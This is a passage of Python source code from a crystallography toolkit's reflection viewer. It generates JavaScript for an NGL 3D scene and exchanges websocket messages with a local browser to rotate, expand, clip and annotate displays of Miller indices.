//script.src='https://rawgit.com/paulirish/memory-stats.js/master/bookmarklet.js';
//document.head.appendChild(script);
// define tooltip element
var tooltip = document.createElement("div");
Object.assign(tooltip.style, {
display: "none",
position: "absolute",
zIndex: 10,
pointerEvents: "none",
backgroundColor: "rgba(255, 255, 255, %s )",
color: "black",
padding: "0.1em",
fontFamily: "sans-serif"
});
%s
function HKLscene()
{
shape = new NGL.Shape('shape');
vectorshape = new NGL.Shape('vectorshape');
stage = new NGL.Stage('viewport', { backgroundColor: "grey", tooltip:false,
fogNear: 100, fogFar: 100 });
stage.setParameters( { cameraType: "%s" } );
MakeHKL_Axis(shape);
%s
shapeComp = stage.addComponentFromObject(shape);
repr = shapeComp.addRepresentation('buffer');
shapeComp.autoView();
repr.update();
// if some radii are negative draw them with wireframe
%s
%s
stage.viewer.requestRender();
}
try
{
document.addEventListener('DOMContentLoaded', function() { HKLscene() }, false );
}
catch(err)
{
WebsockSendMsg('JavaScriptError: ' + err.stack );
}
""" % (self.websockport, self.__module__, self.__module__, cntbin, self.ngl_settings.tooltip_alpha, \
axisfuncstr, self.camera_type, spherebufferstr, negativeradiistr, colourscriptstr)
WebsockMsgHandlestr = """
mysocket.onmessage = function (e)
{
var c,
si;
WebsockSendMsg('\\n Browser: Got ' + e.data ); // tell server what it sent us
try
{
var datval = e.data.split(":\\n");
//alert('received2:\\n' + datval);
var msgtype = datval[0];
var val = datval[1].split(",");
if (msgtype === "alpha")
{
bin = parseInt(val[0]);
alphas[bin] = parseFloat(val[1]);
shapebufs[bin].setParameters({opacity: alphas[bin]});
for (var g=0; g < nrots; g++ )
br_shapebufs[bin][g].setParameters({opacity: alphas[bin]});
stage.viewer.requestRender();
}
if (msgtype === "colour")
{
bin = parseInt(val[0]);
si = parseInt(val[1]);
colours[bin][3*si] = parseFloat(val[2]);
colours[bin][3*si+1] = parseFloat(val[3]);
colours[bin][3*si+2] = parseFloat(val[4]);
shapebufs[bin].setAttributes({ color: colours[bin] });
for (var g=0; g < nrots; g++ )
{
br_colours[bin][3*si] = parseFloat(val[2]);
br_colours[bin][3*si+1] = parseFloat(val[3]);
br_colours[bin][3*si+2] = parseFloat(val[4]);
br_shapebufs[bin][g].setAttributes({ color: br_colours[bin] });
}
stage.viewer.requestRender();
}
if (msgtype === "ShowTooltip")
{
current_ttip = eval( String(val));
}
if (msgtype === "Redraw")
{
stage.viewer.requestRender();
}
if (msgtype === "ReOrient")
{
WebsockSendMsg( 'Reorienting ' + pagename );
sm = new Float32Array(16);
//alert('ReOrienting: ' + val)
for (j=0; j<16; j++)
sm[j] = parseFloat(val[j]);
var m = new NGL.Matrix4();
m.fromArray(sm);
stage.viewerControls.orient(m);
stage.viewer.renderer.setClearColor( 0xffffff, 0.01);
stage.viewer.requestRender();
}
if (msgtype === "Reload")
{
// refresh browser with the javascript file
cvorient = stage.viewerControls.getOrientation().elements;
msg = String(cvorient);
WebsockSendMsg('OrientationBeforeReload:\\n' + msg );
WebsockSendMsg( 'Refreshing ' + pagename );
window.location.reload(true);
}
if (msgtype.includes("Expand") )
{
WebsockSendMsg( 'Expanding data...' );
// delete the shapebufs[] that holds the positions[] arrays
shapeComp.removeRepresentation(repr);
// remove shapecomp from stage first
stage.removeComponent(shapeComp);
br_positions = [];
br_colours = [];
br_radii = [];
br_ttips = [];
br_shapebufs = [];
//alert('rotations:\\n' + val);
// Rotation matrices are concatenated to a string of floats
// separated by line breaks between each rotation matrix
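// For illustration (an assumed example matching what ExpandInBrowser assembles on the python side),
// datval[1] might look like "1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0\\n0.0, -1.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0",
// i.e. nine comma separated matrix elements per line, one line per symmetry operator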
rotationstrs = datval[1].split("\\n");
var Rotmat = new NGL.Matrix3();
var sm = new Float32Array(9);
var r = new NGL.Vector3();
for (var bin=0; bin<nbins; bin++)
{
var nsize = positions[bin].length/3; // number of reflections in each bin
var csize = nsize*3;
var nsize3 = nsize*3;
var anoexp = false;
if (msgtype.includes("Friedel") )
{
anoexp = true;
csize = nsize*6;
}
br_positions.push( [] );
br_shapebufs.push( [] );
br_colours.push( [] );
br_radii.push( [] );
br_ttips.push( [] );
br_colours[bin] = colours[bin];
br_radii[bin] = radii[bin];
if (anoexp)
{
var colarr = [];
var cl = colours[bin].length;
for (var i=0; i<cl; i++)
{
colarr[i] = colours[bin][i];
colarr[i+cl] = colours[bin][i];
}
br_colours[bin] = new Float32Array(colarr);
var radiiarr = [];
var rl = radii[bin].length;
for (var i=0; i<rl; i++)
{
radiiarr[i] = radii[bin][i];
radiiarr[i+rl] = radii[bin][i];
}
br_radii[bin] = new Float32Array(radiiarr);
}
nrots = 0;
// if there is only the identity matrix that means no P1 expansion
for (var rotmxidx=0; rotmxidx < rotationstrs.length; rotmxidx++ )
{
if (rotationstrs[rotmxidx] < 1 )
continue;
nrots++;
br_positions[bin].push( [] );
br_shapebufs[bin].push( [] );
br_ttips[bin].push( [] );
br_ttips[bin][rotmxidx] = ttips[bin].slice(); // deep copy with slice()
br_ttips[bin][rotmxidx][0] = rotmxidx;
br_positions[bin][rotmxidx] = new Float32Array( csize );
// convert string of rotation matrix elements into a Matrix3
var elmstrs = rotationstrs[rotmxidx].split(",");
//alert('rot' + rotmxidx + ': ' + elmstrs);
for (j=0; j<9; j++)
sm[j] = parseFloat(elmstrs[j]);
Rotmat.fromArray(sm);
for (var i=0; i<nsize; i++)
{
idx= i*3;
r.x = positions[bin][idx];
r.y = positions[bin][idx+1];
r.z = positions[bin][idx+2];
r.applyMatrix3(Rotmat)
br_positions[bin][rotmxidx][idx] = r.x;
br_positions[bin][rotmxidx][idx + 1] = r.y;
br_positions[bin][rotmxidx][idx + 2] = r.z;
if (anoexp)
{
r.negate(); // inversion for anomalous pair
br_positions[bin][rotmxidx][nsize3 + idx] = r.x;
br_positions[bin][rotmxidx][nsize3 + idx + 1] = r.y;
br_positions[bin][rotmxidx][nsize3 + idx + 2] = r.z;
}
}
br_shapebufs[bin][rotmxidx] = new NGL.SphereBuffer({
position: br_positions[bin][rotmxidx],
color: br_colours[bin],
radius: br_radii[bin],
// rotmxidx serves as the id of the applied symmetry operator's rotation when creating the tooltip for an hkl
picking: br_ttips[bin][rotmxidx],
} %s );
shape.addBuffer(br_shapebufs[bin][rotmxidx]);
//WebsockSendMsg( 'Memory usage: ' + String(window.performance.memory.totalJSHeapSize) +
// ', ' + String(window.performance.memory.totalJSHeapSize) );
}
}
MakeHKL_Axis(shape);
shapeComp = stage.addComponentFromObject(shape);
repr = shapeComp.addRepresentation('buffer');
for (var bin=0; bin<nbins; bin++)
{
for (var rotmxidx=0; rotmxidx < nrots; rotmxidx++ )
{
br_shapebufs[bin][rotmxidx].setParameters({opacity: alphas[bin]});
}
}
stage.viewer.requestRender();
WebsockSendMsg( 'Expanded data' );
}
if (msgtype === "DisableMouseRotation")
{
WebsockSendMsg( 'Fix mouse rotation' + pagename );
stage.mouseControls.remove("drag-left");
stage.mouseControls.remove("scroll-ctrl");
stage.mouseControls.remove("scroll-shift");
}
if (msgtype === "EnableMouseRotation")
{
WebsockSendMsg( 'Can mouse rotate ' + pagename );
stage.mouseControls.add("drag-left", NGL.MouseActions.rotateDrag);
stage.mouseControls.add("scroll-ctrl", NGL.MouseActions.scrollCtrl);
stage.mouseControls.add("scroll-shift", NGL.MouseActions.scrollShift);
}
if (msgtype === "RotateStage")
{
WebsockSendMsg( 'Rotating stage ' + pagename );
strs = datval[1].split("\\n");
var sm = new Float32Array(9);
var m4 = new NGL.Matrix4();
var elmstrs = strs[0].split(",");
//alert('rot: ' + elmstrs);
for (j=0; j<9; j++)
sm[j] = parseFloat(elmstrs[j]);
/* GL matrices are the transpose of the conventional rotation matrices
m4.set( sm[0], sm[1], sm[2], 0.0,
sm[3], sm[4], sm[5], 0.0,
sm[6], sm[7], sm[8], 0.0,
0.0, 0.0, 0.0, 1.0
);
*/
m4.set( sm[0], sm[3], sm[6], 0.0,
sm[1], sm[4], sm[7], 0.0,
sm[2], sm[5], sm[8], 0.0,
0.0, 0.0, 0.0, 1.0
);
stage.viewerControls.orient(m4);
if (elmstrs[9].trim() == "verbose")
postrotmxflag = true;
stage.viewer.requestRender();
//cvorient = stage.viewerControls.getOrientation().elements;
//msg = String(cvorient);
//WebsockSendMsg('CurrentViewOrientation:\\n' + msg );
}
if (msgtype === "SpinAnimate")
{
WebsockSendMsg( 'SpinAnimating ' + pagename );
strs = datval[1].split("\\n");
var r = new Float32Array(3);
var elmstrs = strs[0].split(",");
for (j=0; j<3; j++)
r[j] = parseFloat(elmstrs[j]);
if (r[0] == 0.0 && r[1] == 0.0 && r[2] == 0.0)
{
// default bindings as per ngl\src\controls\mouse-actions.ts
stage.mouseControls.add("drag-ctrl-left", NGL.MouseActions.panDrag);
stage.mouseControls.add("drag-ctrl-right", NGL.MouseActions.focusScroll);
stage.mouseControls.add("drag-shift-left", NGL.MouseActions.zoomDrag);
stage.mouseControls.add("drag-shift-right", NGL.MouseActions.zoomFocusDrag);
stage.mouseControls.add("drag-middle", NGL.MouseActions.zoomFocusDrag);
stage.mouseControls.add("drag-right", NGL.MouseActions.panDrag);
stage.mouseControls.add("drag-left", NGL.MouseActions.rotateDrag);
stage.mouseControls.add("scroll-ctrl", NGL.MouseActions.scrollCtrl);
stage.mouseControls.add("scroll-shift", NGL.MouseActions.scrollShift);
stage.setSpin(false);
}
else
{
stage.spinAnimation.axis.set(r[0], r[1], r[2]);
stage.mouseControls.remove("drag-ctrl-left");
stage.mouseControls.remove("drag-ctrl-right");
stage.mouseControls.remove("drag-shift-left");
stage.mouseControls.remove("drag-shift-right");
stage.mouseControls.remove("drag-middle");
stage.mouseControls.remove("drag-right");
stage.mouseControls.remove("drag-left");
stage.mouseControls.remove("scroll-ctrl");
stage.mouseControls.remove("scroll-shift");
stage.setSpin(true);
}
}
if (msgtype === "TranslateHKLpoints")
{
WebsockSendMsg( 'Translating HKLs ' + pagename );
strs = datval[1].split("\\n");
var sm = new Float32Array(3);
var elmstrs = strs[0].split(",");
//alert('trans: ' + elmstrs);
for (j=0; j<3; j++)
sm[j] = parseFloat(elmstrs[j]);
shapeComp.setPosition([ sm[0], sm[1], sm[2] ])
stage.viewer.requestRender();
}
if (msgtype === "AddVector")
{
strs = datval[1].split("\\n");
var r1 = new Float32Array(3);
var r2 = new Float32Array(3);
var rgb = new Float32Array(3);
var elmstrs = strs[0].split(",");
for (j=0; j<3; j++)
{
r1[j] = parseFloat(elmstrs[j]);
r2[j] = parseFloat(elmstrs[j+3]);
rgb[j]= parseFloat(elmstrs[j+6]);
}
vectorshape.addArrow( r1, r2 , [rgb[0], rgb[1], rgb[2]], 0.15);
if (elmstrs[9].trim() !== "") {
var txtR = [ r1[0] + r2[0], r1[1] + r2[1], r1[2] + r2[2] ];
vectorshape.addText( txtR, [rgb[0], rgb[1], rgb[2]], fontsize/2.0, elmstrs[9] );
}
// if reprname is supplied with a vector then make a representation named reprname
// of this and all pending vectors stored in vectorshape and render them.
// Otherwise just accumulate the new vector
var reprname = elmstrs[10].trim();
if (reprname != "")
{
vectorshapeComps.push( stage.addComponentFromObject(vectorshape) );
vectorreprs.push(
vectorshapeComps[vectorshapeComps.length-1].addRepresentation('vecbuf',
{ name: reprname} )
);
stage.viewer.requestRender();
}
}
if (msgtype === "RemoveVectors")
{
strs = datval[1].split("\\n");
var elmstrs = strs[0].split(",");
var reprname = elmstrs[0].trim();
// if reprname is supplied only remove vectors with that name
if (reprname != "")
{
thisrepr = stage.getRepresentationsByName(reprname);
for (i=0; i<stage.compList.length; i++)
if (stage.compList[i].reprList[0].name == reprname)
{
thiscomp = stage.compList[i];
thiscomp.removeRepresentation(thisrepr);
stage.removeComponent(thiscomp);
}
}
else // otherwise remove all vectors
{
for (i=0; i<vectorshapeComps.length; i++)
{
vectorshapeComps[i].removeRepresentation(vectorreprs[i]);
stage.removeComponent(vectorshapeComps[i]);
}
vectorshapeComps = [];
vectorreprs = [];
}
clipFixToCamPosZ = false;
stage.viewer.requestRender();
}
if (msgtype === "TooltipOpacity")
{
strs = datval[1].split("\\n");
var elmstrs = strs[0].split(",");
Object.assign(tooltip.style, {
backgroundColor: "rgba(255, 255, 255, " + elmstrs[0] + " )",
});
}
if (msgtype === "SetTrackBallRotateSpeed")
{
strs = datval[1].split("\\n");
var elmstrs = strs[0].split(",");
stage.trackballControls.rotateSpeed = parseFloat(elmstrs[0]);
}
if (msgtype === "GetTrackBallRotateSpeed")
{
msg = String( [stage.trackballControls.rotateSpeed] )
WebsockSendMsg('ReturnTrackBallRotateSpeed:\\n' + msg );
}
if (msgtype === "SetClipPlaneDistances")
{
strs = datval[1].split("\\n");
var elmstrs = strs[0].split(",");
var near = parseFloat(elmstrs[0]);
var far = parseFloat(elmstrs[1]);
origcameraZpos = parseFloat(elmstrs[2]);
stage.viewer.parameters.clipMode = 'camera';
stage.viewer.parameters.clipScale = 'absolute';
if (near >= far )
{ // default to no clipping if near >= far
stage.viewer.parameters.clipMode = 'scene';
stage.viewer.parameters.clipScale = 'relative';
near = -1000;
far = 1000;
}
stage.viewer.parameters.clipNear = near;
stage.viewer.parameters.clipFar = far;
origclipnear = near;
origclipfar = far;
clipFixToCamPosZ = true;
stage.viewer.camera.position.z = origcameraZpos;
stage.viewer.requestRender();
}
if (msgtype === "GetClipPlaneDistances")
{
msg = String( [stage.viewer.parameters.clipNear,
stage.viewer.parameters.clipFar,
stage.viewer.camera.position.z] )
WebsockSendMsg('ReturnClipPlaneDistances:\\n' + msg );
}
if (msgtype === "GetBoundingBox")
{
msg = String( [stage.viewer.boundingBoxSize.x,
stage.viewer.boundingBoxSize.y,
stage.viewer.boundingBoxSize.z]
)
WebsockSendMsg('ReturnBoundingBox:\\n' + msg );
}
if (msgtype === "InjectNewReflections")
{
WebsockSendMsg( 'Rendering new reflections ' + pagename );
var nrefl = parseInt(val.length/7);
if (nrefl !== val.length/7)
{
alert("Mismatch in array of reflections, colours and radii!")
return;
}
// delete the shapebufs[] that holds the positions[] arrays
shapeComp.removeRepresentation(repr);
// remove shapecomp from stage first
stage.removeComponent(shapeComp);
positions = [];
colours = [];
radii = [];
alphas = [];
shapebufs = [];
ttips = [];
shapebufs = [];
nbins = 1; // currently no binning when injecting reflections
positions_ = []; // dummy variables for conforming to binning scheme above
colours_ = []; // as used when expanding reflections
radii_ = [];
ttips_ = [-1]
for (j=0; j<nrefl; j++)
{
positions_.push( parseFloat(val[7*j]) );
positions_.push( parseFloat(val[7*j+1]) );
positions_.push( parseFloat(val[7*j+2]) );
colours_.push( parseFloat(val[7*j+3]) );
colours_.push( parseFloat(val[7*j+4]) );
colours_.push( parseFloat(val[7*j+5]) );
radii_.push( parseFloat(val[7*j+6]) );
ttips_.push(j)
}
positions.push( new Float32Array( positions_ ));
colours.push( new Float32Array( colours_ ));
radii.push( new Float32Array( radii_ ));
ttips.push(ttips_);
shapebufs.push( new NGL.SphereBuffer({
position: positions[0],
color: colours[0],
radius: radii[0],
picking: ttips[0],
})
);
shape.addBuffer(shapebufs[0]);
alphas.push(1.0);
MakeHKL_Axis(shape);
shapeComp = stage.addComponentFromObject(shape);
repr = shapeComp.addRepresentation('buffer');
stage.viewer.requestRender();
WebsockSendMsg('Injected new reflections');
}
if (msgtype === "Testing")
{
// test something new
WebsockSendMsg( 'Testing something new ' + pagename );
/*
var newradii = radii[0].map(function(element) {
return element*1.5;
});
shapebufs[0].setAttributes({
radius: newradii
})
repr = shapeComp.addRepresentation('buffer');
stage.viewer.requestRender();
*/
}
}
catch(err)
{
WebsockSendMsg('JavaScriptError: ' + err.stack );
}
};
""" %qualitystr
self.NGLscriptstr += WebsockMsgHandlestr
if self.jscriptfname:
with open( self.jscriptfname, "w") as f:
f.write( self.NGLscriptstr )
self.ReloadNGL()
if not blankscene:
self.GetClipPlaneDistances()
self.GetBoundingBox()
self.OrigClipFar = self.clipFar
self.OrigClipNear = self.clipNear
self.SetTrackBallRotateSpeed( self.ngl_settings.mouse_sensitivity )
self.sceneisdirty = False
def OnConnectWebsocketClient(self, client, server):
#if not self.websockclient:
self.websockclient = client
self.mprint( "Browser connected:" + str( self.websockclient ), verbose=1 )
#else:
# self.mprint( "Unexpected browser connection was rejected" )
def OnWebsocketClientMessage(self, client, server, message):
if self.viewerparams.scene_id is None or self.miller_array is None:
return
try:
if message != "":
if "Orientation" in message:
self.orientmessage = message
self.ProcessOrientationMessage()
else:
self.mprint( message, verbose=4)
self.lastmsg = message
if "JavaScriptError:" in message:
self.mprint( message, verbose=0)
#raise Sorry(message)
if "OrientationBeforeReload:" in message:
#sleep(0.2)
self.mprint( "Reorienting client after refresh:" + str( self.websockclient ), verbose=2 )
if not self.isnewfile:
self.viewmtrx = self.orientmessage[ self.orientmessage.find("\n") + 1: ]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
self.msgqueue.append( ("ReOrient", self.viewmtrx) )
self.isnewfile = False
if "ReturnClipPlaneDistances:" in message:
datastr = message[ message.find("\n") + 1: ]
lst = datastr.split(",")
flst = [float(e) for e in lst]
self.clipNear = flst[0]
self.clipFar = flst[1]
self.cameraPosZ = flst[2]
self.params.clip_plane.clipwidth = None
if "ReturnBoundingBox:" in message:
datastr = message[ message.find("\n") + 1: ]
lst = datastr.split(",")
flst = [float(e) for e in lst]
self.boundingX = flst[0]
self.boundingY = flst[1]
self.boundingZ = flst[2]
if "ReturnTrackBallRotateSpeed" in message:
datastr = message[ message.find("\n") + 1: ]
lst = datastr.split(",")
flst = [float(e) for e in lst]
self.ngl_settings.mouse_sensitivity = flst[0]
if "tooltip_id:" in message:
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
sym_id = eval(message.split("tooltip_id:")[1])[0]
id = eval(message.split("tooltip_id:")[1])[1]
is_friedel_mate = eval(message.split("tooltip_id:")[1])[2]
rotmx = None
if sym_id >= 0 and sym_id < len(self.symops):
rotmx = self.symops[sym_id].r()
hkls = self.scene.indices
if not is_friedel_mate:
ttip = self.GetTooltipOnTheFly(id, rotmx)
else:
# if id > len(hkls) then these hkls are added as the friedel mates during the
# "if (anoexp)" condition in the javascript code
id = id % len(hkls)
ttip = "id: %d" %id
#ttip = self.GetTooltipOnTheFly(hkls[id], rotmx, anomalous=True)
ttip = self.GetTooltipOnTheFly(id, rotmx, anomalous=True)
self.SendMsgToBrowser("ShowTooltip", ttip)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
except Exception as e:
self.mprint( to_str(e) + "\n" + traceback.format_exc(limit=10), verbose=0)
def ProcessOrientationMessage(self):
if self.orientmessage is None:
return
if self.orientmessage.find("NaN")>=0:
return
self.viewmtrx = self.orientmessage[ self.orientmessage.find("\n") + 1: ]
lst = self.viewmtrx.split(",")
flst = [float(e) for e in lst]
ScaleRotMx = matrix.sqr( (flst[0], flst[4], flst[8],
flst[1], flst[5], flst[9],
flst[2], flst[6], flst[10]
)
)
self.cameratranslation = (flst[12], flst[13], flst[14])
self.mprint("translation: %s" %str(roundoff(self.cameratranslation)), verbose=3)
self.cameradist = math.pow(ScaleRotMx.determinant(), 1.0/3.0)
self.mprint("distance: %s" %roundoff(self.cameradist), verbose=3)
self.rotation_mx = ScaleRotMx/self.cameradist
rotlst = roundoff(self.rotation_mx.elems)
self.mprint("""Rotation matrix:
%s, %s, %s
%s, %s, %s
%s, %s, %s
""" %rotlst, verbose=3)
alllst = roundoff(flst)
self.mprint("""OrientationMatrix matrix:
%s, %s, %s, %s
%s, %s, %s, %s
%s, %s, %s, %s
%s, %s, %s, %s
""" %tuple(alllst), verbose=4)
self.params.mouse_moved = True
if self.rotation_mx.is_r3_rotation_matrix():
angles = self.rotation_mx.r3_rotation_matrix_as_x_y_z_angles(deg=True)
self.mprint("angles: %s" %str(roundoff(angles)), verbose=3)
z_vec = flex.vec3_double( [(0,0,1)])
self.rot_zvec = z_vec * self.rotation_mx
self.mprint("Rotated cartesian Z direction : %s" %str(roundoff(self.rot_zvec[0])), verbose=3)
rfracmx = matrix.sqr( self.miller_array.unit_cell().reciprocal().fractionalization_matrix() )
self.rot_recip_zvec = self.rot_zvec * rfracmx
self.rot_recip_zvec = (1.0/self.rot_recip_zvec.norm()) * self.rot_recip_zvec
self.mprint("Rotated reciprocal L direction : %s" %str(roundoff(self.rot_recip_zvec[0])), verbose=3)
def WaitforHandshake(self, sec):
nwait = 0
while not self.websockclient:
time.sleep(self.sleeptime)
nwait += self.sleeptime
if nwait > sec:
return False
return True
def WebBrowserMsgQueue(self):
try:
while True:
nwait = 0.0
sleep(self.sleeptime)
if len(self.msgqueue):
pendingmessagetype, pendingmessage = self.msgqueue[0]
self.SendMsgToBrowser(pendingmessagetype, pendingmessage)
while not (self.browserisopen and self.websockclient):
sleep(self.sleeptime)
nwait += self.sleeptime
if nwait > self.handshakewait and self.browserisopen:
self.mprint("ERROR: No handshake from browser! Security settings may have to be adapted", verbose=0 )
return
#break
self.msgqueue.remove( self.msgqueue[0] )
# if the html content is huge the browser will be unresponsive until it has finished
# reading the html content. This may crash this thread. So try restarting this thread until
# browser is ready
except Exception as e:
self.mprint( str(e) + ", Restarting WebBrowserMsgQueue\n" \
+ traceback.format_exc(limit=10), verbose=2)
self.WebBrowserMsgQueue()
def SendMsgToBrowser(self, msgtype, msg=""):
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
#print "self.server.clients: ", self.server.clients
#print "self.websockclient: ",
message = u"" + msgtype + self.msgdelim + str(msg)
if self.websockclient:
nwait = 0.0
while not ("Ready" in self.lastmsg or "tooltip_id" in self.lastmsg \
or "CurrentViewOrientation" in self.lastmsg):
sleep(self.sleeptime)
nwait += self.sleeptime
if nwait > self.handshakewait and self.browserisopen:
break
self.server.send_message(self.websockclient, message )
else:
self.OpenBrowser()
def StartWebsocket(self):
self.server = WebsocketServer(self.websockport, host='127.0.0.1')
if not self.server:
raise Sorry("Could not connect to web browser")
self.server.set_fn_new_client(self.OnConnectWebsocketClient)
self.server.set_fn_message_received(self.OnWebsocketClientMessage)
self.wst = threading.Thread(target=self.server.run_forever)
self.wst.daemon = True
self.wst.start()
self.msgqueuethrd = threading.Thread(target = self.WebBrowserMsgQueue )
self.msgqueuethrd.daemon = True
self.msgqueuethrd.start()
def set_camera_type(self):
self.camera_type = self.ngl_settings.camera_type
def set_tooltip_opacity(self):
msg = "%f" %self.ngl_settings.tooltip_alpha
self.SendMsgToBrowser("TooltipOpacity", msg)
def SetOpacities(self, bin_opacities_str):
retstr = ""
if self.miller_array and bin_opacities_str and not self.isinjected:
self.ngl_settings.bin_opacities = bin_opacities_str
bin_opacitieslst = eval(self.ngl_settings.bin_opacities)
for binopacity in bin_opacitieslst:
alpha = binopacity[0] # float(binopacity.split(",")[0])
bin = binopacity[1] # int(binopacity.split(",")[1])
retstr += self.set_opacity(bin, alpha)
self.SendInfoToGUI( { "bin_opacities": self.ngl_settings.bin_opacities } )
return retstr
def set_opacity(self, bin, alpha):
if bin > self.nbinvalsboundaries-1:
return "There are only %d bins present\n" %self.nbinvalsboundaries
msg = "%d, %f" %(bin, alpha)
self.SendMsgToBrowser("alpha", msg)
return "Opacity %s set on bin[%s]\n" %(alpha, bin)
def RedrawNGL(self):
#self.SendMsgToBrowser("Redraw")
self.msgqueue.append( ("Redraw", "") )
def ReloadNGL(self): # expensive as javascript may be several Mbytes large
self.mprint("Rendering JavaScript...", verbose=1)
#self.SendMsgToBrowser("Reload")
self.msgqueue.append( ("Reload", "") )
def OpenBrowser(self):
if not self.browserisopen:
#NGLlibpath = libtbx.env.under_root(os.path.join("modules","cctbx_project","crys3d","hklview","ngl.js") )
NGLlibpath = libtbx.env.under_root(os.path.join("modules","cctbx_project","crys3d","hklview","ngl.dev.js") )
htmlstr = self.hklhtml %(NGLlibpath, os.path.abspath( self.jscriptfname))
htmlstr += self.htmldiv
with open(self.hklfname, "w") as f:
f.write( htmlstr )
self.url = "file:///" + os.path.abspath( self.hklfname )
self.url = self.url.replace("\\", "/")
self.mprint( "Writing %s and connecting to its websocket client" %self.hklfname, verbose=1)
if self.UseOSBrowser:
webbrowser.open(self.url, new=1)
self.SendInfoToGUI({ "html_url": self.url } )
self.isnewfile = False
self.browserisopen = True
def ExpandInBrowser(self, P1=True, friedel_mate=True):
retmsg = "Not expanding in browser\n"
if self.sceneisdirty:
return retmsg
uc = self.miller_array.unit_cell()
OrtMx = matrix.sqr( uc.orthogonalization_matrix())
InvMx = OrtMx.inverse()
msgtype = "Expand"
msg = ""
unique_rot_ops = []
if P1:
msgtype += "P1"
unique_rot_ops = self.symops[ 0 : self.sg.order_p() ] # avoid duplicate rotation matrices
retmsg = "Expanding to P1 in browser\n"
if not self.miller_array.is_unique_set_under_symmetry():
retmsg += "Not all reflections are in the same asymmetric unit in reciprocal space.\n"
retmsg += "Some reflections might be displayed on top of one another.\n"
else:
unique_rot_ops = [ self.symops[0] ] # No P1 expansion. So only submit the identity matrix
if friedel_mate and not self.miller_array.anomalous_flag():
msgtype += "Friedel"
retmsg = "Expanding Friedel mates in browser\n"
for i, symop in enumerate(unique_rot_ops):
RotMx = matrix.sqr( symop.r().as_double())
ortrot = (OrtMx * RotMx * InvMx).as_mat3()
if RotMx.is_r3_identity_matrix():
# avoid machine precision rounding errors converting 1.0 to 0.99999999..
ortrot = (1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0)
str_rot = str(ortrot)
str_rot = str_rot.replace("(", "")
str_rot = str_rot.replace(")", "")
msg += str_rot + "\n"
self.msgqueue.append( (msgtype, msg) )
self.GetBoundingBox() # bounding box changes when the extent of the displayed lattice changes
return retmsg
def AddVector(self, s1, s2, s3, t1, t2, t3, isreciprocal=True, label="",
r=0, g=0, b=0, name=""):
"""
Place vector from [s1, s2, s3] to [t1, t2, t3] with colour r,g,b and label
If name=="" creation is deferred until AddVector is eventually called with name != ""
These vectors are then joined in the same NGL representation
"""
uc = self.miller_array.unit_cell()
vec1 = (s1*self.scene.renderscale, s2*self.scene.renderscale, s3*self.scene.renderscale)
vec2 = (t1*self.scene.renderscale, t2*self.scene.renderscale, t3*self.scene.renderscale)
#svec = list(vec)
if isreciprocal:
# uc.reciprocal_space_vector() only takes integer miller indices so compute
# the cartesian coordinates for real valued miller indices with the transpose of the fractionalization matrix
vec1 = list( vec1 * matrix.sqr(uc.fractionalization_matrix()).transpose() )
vec2 = list( vec2 * matrix.sqr(uc.fractionalization_matrix()).transpose() )
svec1 = [ vec1[0], vec1[1], vec1[2] ]
svec2 = [ vec2[0], vec2[1], vec2[2] ]
else:
vec1 = list( vec1 * matrix.sqr(uc.orthogonalization_matrix()) )
vec2 = list( vec2 * matrix.sqr(uc.orthogonalization_matrix()) )
vscale = 200.0/uc.volume()
# TODO: find suitable scale factor for displaying real space vector together with reciprocal vectors
svec1 = [ vscale*vec1[0], vscale*vec1[1], vscale*vec1[2] ]
svec2 = [ vscale*vec2[0], vscale*vec2[1], vscale*vec2[2] ]
self.mprint("cartesian vector is: %s to %s" %(str(roundoff(svec1)), str(roundoff(svec2))), verbose=1)
svec = [svec2[0]-svec1[0], svec2[1]-svec1[1], svec2[2]-svec1[2] ]
xyvec = svec[:] # deep copying
xyvec[2] = 0.0 # projection vector of svec in the xy plane
xyvecnorm = math.sqrt( xyvec[0]*xyvec[0] + xyvec[1]*xyvec[1] )
if xyvecnorm > 0.0:
angle_x_xyvec = math.acos( xyvec[0]/xyvecnorm )*180.0/math.pi
angle_y_xyvec = math.acos( xyvec[1]/xyvecnorm )*180.0/math.pi
else:
angle_x_xyvec = 90.0
angle_y_xyvec = 90.0
yzvec = svec[:]
yzvec[0] = 0.0 # projection vector of svec in the yz plane
yzvecnorm = math.sqrt( yzvec[1]*yzvec[1] + yzvec[2]*yzvec[2] )
if yzvecnorm > 0.0:
angle_y_yzvec = math.acos( yzvec[1]/yzvecnorm )*180.0/math.pi
angle_z_yzvec = math.acos( yzvec[2]/yzvecnorm )*180.0/math.pi
else:
angle_y_yzvec = 90.0
angle_z_yzvec = 90.0
svecnorm = math.sqrt( svec[0]*svec[0] + svec[1]*svec[1] + svec[2]*svec[2] )
angle_x_svec = math.acos( svec[0]/svecnorm )*180.0/math.pi
angle_y_svec = math.acos( svec[1]/svecnorm )*180.0/math.pi
angle_z_svec = math.acos( svec[2]/svecnorm )*180.0/math.pi
if angle_y_svec > 90.0:
angle_x_xyvec = -angle_x_xyvec
self.mprint("angles in xy plane to x,y axis are: %s, %s" %(angle_x_xyvec, angle_y_xyvec), verbose=2)
self.mprint("angles in yz plane to y,z axis are: %s, %s" %(angle_y_yzvec, angle_z_yzvec), verbose=2)
self.mprint("angles to x,y,z axis are: %s, %s, %s" %(angle_x_svec, angle_y_svec, angle_z_svec ), verbose=2)
self.msgqueue.append( ("AddVector", "%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s" \
%tuple(svec1 + svec2 + [r, g, b, label, name]) ))
return angle_x_xyvec, angle_z_svec
def PointVectorPerpendicularToClipPlane(self):
rotmx = self.Euler2RotMatrix(( self.angle_x_xyvec, self.angle_z_svec, 0.0 ))
if rotmx.determinant() < 0.99999:
self.mprint("Rotation matrix determinant is less than 1")
return rotmx
self.RotateMxStage(rotmx)
return rotmx
def PointVectorParallelToClipPlane(self):
rotmx = self.Euler2RotMatrix(( self.angle_x_xyvec, self.angle_z_svec+90.0, 90.0 ))
if rotmx.determinant() < 0.99999:
self.mprint("Rotation matrix determinant is less than 1")
return rotmx
self.RotateMxStage(rotmx)
return rotmx
